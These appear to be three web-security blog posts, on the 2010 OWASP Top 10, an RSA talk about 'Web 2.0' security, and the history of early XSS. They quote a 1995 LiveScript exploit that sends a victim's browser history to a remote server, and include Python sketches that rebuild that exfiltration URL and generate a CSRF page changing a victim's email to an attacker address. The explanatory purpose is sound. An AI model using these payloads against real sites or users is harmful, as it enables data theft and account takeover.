
-

One curious point about the new 2010 OWASP Top 10 Application Security Risks is that only 3 of them aren’t common. The “Weakness Prevalence” for each of Insecure Cryptographic Storage (A7), Failure to Restrict URL Access (A8), and Unvalidated Redirects and Forwards (A10) is rated uncommon. That doesn’t mean that an uncommon risk can’t be a critical one. These three items highlight the challenge of producing a list with risks that often lack context.

Risk is difficult to quantify. The OWASP Top 10 includes a What’s My Risk? section with guidance on how to interpret the list. That guidance is based on the experience of people who perform penetration tests, code reviews, and research web security.

The Top 10 rates Insecure Cryptographic Storage (A7) as uncommon in prevalence and difficult to detect. One reason it’s hard to detect is that external scanners can’t review datastores, and source code scanners can’t identify these problems other than by flagging misuse of a language’s crypto functions. Thus, one interpretation is that insecure crypto is rated uncommon because few people have discovered such problems. Yet not salting a password hash is one of the most egregious mistakes a dev can make while also being one of the easier problems to fix. The practice of salting password hashes has been around since Unix epoch time was in single digits.
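To make the salting point concrete, here is a minimal sketch in Python. It is not taken from the Top 10 itself. It assumes PBKDF2 with SHA-256 from the standard library as the hash, a 16-byte random salt, and an iteration count picked purely for illustration; the function names are hypothetical.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

ITERATIONS = 100_000  # illustrative work factor, an assumption rather than a recommendation


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest). A fresh random salt is generated when none is given."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected)
```

Because each account gets its own salt, two users with the same password end up with different stored digests, so a single precomputed table can’t be reused across the whole datastore.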

It’s also interesting that insecure crypto is the only one on the list that’s rated difficult to detect. Conversely, Cross-Site Scripting (A2) is “very widespread” and “easy” to detect. But maybe it’s very widespread because it’s so trivial to find. People might simply choose to search for vulns that require minimal tools and skill to identify. On the other hand, XSS might be very widespread because it’s not easy to find in a way that scales with large apps or complex workflows in apps. Of course, this also assumes someone’s looking for it in the first place.

Broken Authentication and Session Management (A3) covers brute force attacks against login pages. It’s an item whose risk is too often demonstrated by real-world attacks. In 2010 the Apache Foundation suffered an attack that relied on brute forcing a password. Apache’s network had a similar password-related intrusion in 2001. (I mention these because of the clarity of their postmortems, not to insinuate that the Apache Foundation is inherently insecure.) In 2009, another password guesser found happiness with Twitter.

Knowing an account’s password is the best way to steal a user’s data and gain unauthorized access to a site. The only markers for an attacker using valid credentials are behavioral patterns: time of day, duration of activity, geographic source of the connection, and so on. The attacker doesn’t have to use any malicious characters or techniques like those needed for XSS or SQL injection.
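As a rough illustration of what checking those behavioral markers might look like, the sketch below compares a login against an account’s earlier logins. The `Login` record, its fields, and the exact-match rules are all assumptions made for the example; a real system would need something far more tolerant of normal variation.

```python
from dataclasses import dataclass
from typing import List


@dataclass
class Login:
    hour: int      # hour of day (0-23) when the login happened
    country: str   # geographic source of the connection


def unusual_signals(history: List[Login], attempt: Login) -> List[str]:
    """Name the markers on which this attempt differs from every earlier login."""
    signals: List[str] = []
    if not history:
        return signals  # nothing to compare against yet
    if attempt.hour not in {login.hour for login in history}:
        signals.append("time of day")
    if attempt.country not in {login.country for login in history}:
        signals.append("geographic source")
    return signals
```

Note that nothing in the request itself is inspected. With valid credentials there is no malicious payload to match, only a pattern that looks out of place.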

The impact of a compromised password is similar to how CSRF (A5) works. The nature of a CSRF attack is to force a victim’s browser to make a request to the target app using the context of the victim’s authenticated session. For example, a CSRF attack might change the victim’s password to a value chosen by the attacker, or update the victim’s email to one owned by the attacker.

By design, browsers make many requests without direct interaction from a user, such as loading images, CSS, JavaScript, and iframes. CSRF requires the victim’s browser to visit a booby-trapped page, but doesn’t require the victim to interact with that page. The target web app neither sees the attacker’s traffic nor even suspects the attacker’s activity because all of the interaction occurs between the victim’s browser and the app.

CSRF serves as a good example of the changing nature of the web security industry. CSRF vulns have existed as long as the web. The attack takes advantage of the fundamental nature of HTML and HTTP whereby browsers automatically load certain types of resources. Importantly, the attack just needs to build a request. It doesn’t need to read a response. It isn’t inhibited by the Same Origin Policy.
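A small sketch shows how little a booby-trapped page needs. It assumes a hypothetical target app that changes an account’s email in response to a plain GET request; the URL, parameter name, and function name are invented for illustration. The page contains no script at all, just an image tag the browser loads automatically.

```python
from html import escape
from urllib.parse import urlencode


def booby_trapped_page(target_url: str, params: dict) -> str:
    """Build a page whose only job is to make the visitor's browser send one request."""
    forged_request = f"{target_url}?{urlencode(params)}"
    return (
        "<html><body>\n"
        "<p>Nothing to see here.</p>\n"
        # The browser fetches the "image" on its own, attaching the victim's cookies.
        f'<img src="{escape(forged_request, quote=True)}" width="1" height="1" alt="">\n'
        "</body></html>"
    )


page = booby_trapped_page(
    "https://app.example/account/email",      # hypothetical vulnerable endpoint
    {"email": "attacker@evil.example"},       # value chosen by the attacker
)
```

The attacker’s page never reads what the app sends back. Building the request is enough, which is why the Same Origin Policy offers no protection here.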

CSRF hopped on the Top 10 list’s revision in 2007, four years after the list’s first appearance. It’s doubtful that CSRF vulns were any more or less prevalent over that four-year period. Its inclusion was due to a better understanding of the vuln and appreciation of its potential impacts. Its risk is likely to increase when the pool of victims can be measured in the hundreds of millions rather than the hundreds of thousands.

This vuln also highlights an observation bias of appsec. Now that CSRF is in vogue people start to look for it everywhere. Security conferences get more presentations about advanced ways to exploit it, even though real-world attackers seem fine with the success of guessing passwords, seeding web pages with malware, and phishing.

A knowledgeable or dedicated attacker will find a useful exploit. Risk can include many factors, including Threat Agents (to use the Top 10’s term). Risk increases under a targeted attack – someone actively looking to compromise the app or its users’ data. If you want to add an “Exploitability” metric to your risk estimate, keep in mind that ease of exploitability is often related to the threat agent and tends to be a step function. It might be hard to craft an exploit in the first place, but anyone can run a 42-line Python script that automates an attack.

That’s partially why the Top 10 list should be a starting point for defining security practices for your app, but it shouldn’t be the end of the road. Even the OWASP site warns readers against using the list for policy rather than awareness. If you’ve been worried about information leakage and improper error handling since 2007, don’t think the problem has disappeared because it’s not on the list in 2010.

If you’ve been worried about how to build a secure app, don’t rely on the OWASP Top 10 – it’ll tell you weaknesses to avoid, but falls short on patterns to create.

For more about the OWASP Top 10’s history and possible future, check out this article.

-

RSA Presentation Mar 10, 2010

Last week San Francisco hosted the RSA USA 2010 Conference. I gave a presentation with the buzzword-heavy title, “Does Web 2.0 Need Web Security 2.0?”. The presentation was lamentably labeled Advanced, even though it didn’t touch on in-depth technical details.

The basic premise is that the term “web 2.0” as typically used bears little meaning for security (or otherwise). Most of the security problems of today, let alone the types of web sites, have precedents at least 10 years old. The distinguishing factor is that, although most of the vulnerabilities have remained the same, the number and sophistication of threats have increased.

Of course, there are emerging areas for web development and security, specifically the shift toward heavy client-side computing with JavaScript. So, while sites may be adopting new design patterns based on JSON, the XMLHttpRequest object, and DOM manipulation, they may also be lagging behind on enforcing state management, authorization, and authentication for the server-side aspect of the web site.

As developers continue to struggle with securing complex web applications, consumers of these allegedly 2.0 sites, i.e. Infrastructure, Platform, or Software as a Service, face security and privacy concerns outside of technical vulnerabilities like XSS or SQL injection. Information has value and when the information resides solely in the browser, attackers don’t need to worry about buffer overflows or firewalls in order to compromise that data.

-

Primordial cross-site scripting (XSS) exploits Feb 19, 2010

The Hacking Web Apps book covers HTML Injection and cross-site scripting (XSS) in Chapter 2. Within the restricted confines of the allotted page count, it describes one of the most pervasive attacks that plague modern web applications.

Yet XSS is old. Very, very old. Born in the age of acoustic modems and barely a blink after the creation of the web browser.

Early descriptions of the attack used terms like “malicious HTML” or “malicious JavaScript” before the phrase “cross-site scripting” became canonized by the OWASP Top 10.

While XSS is an easy point of reference, the attack could be more generally called HTML injection because an attack does not have to “cross sites” or rely on JavaScript to be successful. The infamous Samy attack didn’t need to leave the confines of MySpace (nor did it need to access cookies) to effectively DoS the site within 24 hours. Persistent XSS may be just as dangerous if an attacker injects an iframe to a malware site – no JavaScript required.
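The iframe case is easy to sketch. The example below assumes a hypothetical comment feature that drops user text straight into a page, and contrasts it with the same template after the text passes through Python’s `html.escape`. The function names and the malware URL are made up for illustration.

```python
from html import escape


def render_comment_raw(comment: str) -> str:
    """Place user-supplied text into the page exactly as received."""
    return f'<div class="comment">{comment}</div>'


def render_comment_escaped(comment: str) -> str:
    """Encode HTML metacharacters so the browser shows the text instead of parsing it."""
    return f'<div class="comment">{escape(comment)}</div>'


# An injection payload with no JavaScript in it at all.
payload = '<iframe src="https://malware.example/"></iframe>'

raw_page = render_comment_raw(payload)       # the browser would load the iframe
safe_page = render_comment_escaped(payload)  # the browser would display inert text
```

In the raw version the injected markup becomes part of the page every visitor receives, which is what makes the persistent form of the attack so effective.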

Here’s one of the earliest references to the threat of XSS from a message to the comp.sys.acorn.misc newsgroup on June 30, 1996¹. It mentions only a handful of possible outcomes:

Another ‘application’ of JavaScript is to poke holes in Netscape’s security. To anyone using old versions of Netscape before 2.01 (including the beta versions) you can be at risk to malicious Javascript pages which can

a) nick your history

b) nick your email address

c) download malicious files into your cache and run them (although you need to be coerced into pressing the button)

d) examine your filetree.

From that message we can go back several months to the announcement of Netscape Navigator 2.0 on September 18, 1995. A month later Netscape created a “Bugs Bounty” starting with its beta release in October. The bounty offered rewards, including a $1,000 first prize, to anyone who discovered and disclosed a security bug within the browser. A few weeks later the results were announced and first prize went to a nascent JavaScript hack.

The winner of the bug hunt, Scott Weston, posted his find to an Aussie newsgroup. This was almost 15 years ago on December 1, 1995 (note that LiveScript was the precursor to JavaScript):

The “LiveScript” that I wrote extracts ALL the history of the current netscape window. By history I mean ALL the pages that you have visited to get to my page, it then generates a string of these and forces the Netscape client to load a URL that is a CGI script with the QUERY_STRING set to the users History. The CGI script then adds this information to a log file.

Scott, faithful to hackerdom tenets, included a nod to pop-culture in his description of the sensitive data extracted about the unwitting victim²:



- the URL to use to get into CD-NOW as Johnny Mnemonic, including username and password.

- The exact search params he used on Lycos (i.e. exactly what he searched for)

- plus any other places he happened to visit.

HTML injection targets insecure web applications. These were examples of how a successful attack could harm the victim rather than how a web site was hacked. Browser security is important to mitigate the impact of such attacks, but a browser’s fundamental purpose is to parse and execute HTML and JavaScript returned by a web application – a dangerous prospect when the page is laced with malicious content inserted by an attacker.

The attack is almost indistinguishable from a modern payload. A real attack might only have used a more subtle `<img>` or `<iframe>` as opposed to changing the `location.href`:

```html
<SCRIPT LANGUAGE="LiveScript">
i = 0
yourHistory = ""
while (i < history.length) {
  yourHistory += history[i]
  i++;
  if (i < history.length)
    yourHistory += "^"
}
location.href = "http://www.tripleg.com.au/cgi-bin/scott/his?" + yourHistory
<!-- hahah here is the hidden script -->
</SCRIPT>
```

The actual exploit reflected the absurd simplicity typical of XSS attacks. They often require little effort to create, but carry a significant impact.
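The receiving CGI script isn’t shown, so the following is only a guess at its shape. The sketch mirrors the exploit’s loop in Python, joining history entries with `^` into a query string, and then splits them apart again the way a logging script might. The function names and the collector URL are hypothetical.

```python
from typing import List


def build_exfil_url(history: List[str], endpoint: str) -> str:
    """Mirror the exploit's loop: join every history entry with '^' after the '?'."""
    return endpoint + "?" + "^".join(history)


def parse_history(query_string: str) -> List[str]:
    """Split a received QUERY_STRING back into the individual history entries."""
    return [entry for entry in query_string.split("^") if entry]


visited = ["http://a.example/", "http://b.example/search?q=secret"]
url = build_exfil_url(visited, "http://collector.example/cgi-bin/his")

# Everything after the first '?' is what a CGI program would see as QUERY_STRING.
received = parse_history(url.split("?", 1)[1])
```

Search terms and any credentials embedded in a visited URL travel along unchanged, which matches the kind of data described in Scott’s post.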

Before closing let’s take a tangential look at the original $1,000 “Bugs Bounty”. The Chromium team offers $500 and $1,337³ rewards for security-related bugs. The Mozilla Foundation offers $500 and a T-shirt.

(In 2023, these amounts reach even higher into the $20,000 and $40,000 range.)

On the other hand, you can keep the security bug from the browser developers and earn $10,000 and a laptop for a nice, working exploit.

All of those options seem like a superior hourly rate to writing a book.

1. Netscape Navigator 3.0 was already available in April of the same year.

2. Good luck tracking down the May 1981 issue of Omni Magazine in which William Gibson’s short story first appeared!

3. No, the extra $337 isn’t the adjustment for inflation from 1995, which would have made it $1,407.72 according to the Bureau of Labor Statistics. It’s a nod to leetspeak.